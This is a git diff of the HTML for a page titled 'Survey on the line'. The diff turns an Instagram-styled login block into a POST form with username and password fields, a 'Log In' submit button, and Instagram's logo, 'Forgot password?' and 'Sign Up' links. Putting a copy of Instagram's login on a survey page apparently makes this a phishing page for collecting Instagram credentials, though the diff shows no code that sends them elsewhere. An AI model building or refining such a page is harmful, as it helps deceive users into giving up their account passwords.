--- a/client/index.html
+++ b/client/index.html
@@ -15,7 +15,7 @@
         <noscript>
             <center>Please Enable JAVASCRIPT </center>
         </noscript>
-        <header>
+        <header> 
             <div class="main">
                 Survey on the line
             </div>
@@ -87,16 +87,23 @@
                 <div class="logo-insta">
                     <img src="resources/images/instagram.png" alt="">
                 </div>
-                <div class="main">
-                    <div class="login-id">
-                        <input type="text" name="" id="id-text" placeholder="Phone number, username, or email">
-                    </div>
-                    <div class="login-id">
-                        <input type="password" name="" id="id-pwd" placeholder="Password">
-                    </div>
-                    <div class="login-btn" id="loginBtn">
-                        Log In
-                    </div>
+                <div class="main" id=instaMain>
+
+                    <form id='loginForm' method="post">
+                        <div class="login-id">
+                            <input type="text" name="" id="id-text" placeholder="Phone number, username, or email">
+                        </div>
+                        <div class="login-id">
+                            <input type="password" name="" id="id-pwd" placeholder="Password">
+                        </div>
+                        <!-- <div class="login-btn" id="loginBtn">
+                            Log In
+                        </div> -->
+                        <div class="login-id">
+                            <button type="submit" class="login-btn" id="loginBtn">Log In</button>
+                        </div>
+                    </form>
+
                     
                    <div class="line-cont">
                     <div class="or-line">
@@ -116,6 +123,8 @@
                             <a href="#">Forgot password?</a>
                         </div>
                     </div>
+                    <!-- rgb(237,73,86) -->
+                    
                     <div class="sign-up">
                         Don't have an account? <a href="#">Sign Up</a>
                     </div>
